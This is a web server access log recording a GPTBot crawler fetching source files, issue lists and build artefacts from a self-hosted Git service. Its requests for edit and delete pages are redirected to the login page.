"/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:18:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" +[17/Feb/2026:18:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11613] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15297] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" +[17/Feb/2026:18:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13357] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13354] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 12408] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13352] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13354] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:18:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11144] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:18:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:18:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 10941] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:18:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13921] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" +[17/Feb/2026:18:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481677] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" +[17/Feb/2026:18:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56424] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" +[17/Feb/2026:18:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fwarn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 27645] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:18:08:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:18:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:18:08:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:18:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:18:08:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/main.py" +[17/Feb/2026:18:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/main.py" +[17/Feb/2026:18:08:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/main.py" +[17/Feb/2026:18:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/main.py" +[17/Feb/2026:18:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=closed&type=all" +[17/Feb/2026:18:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26364] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26361] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 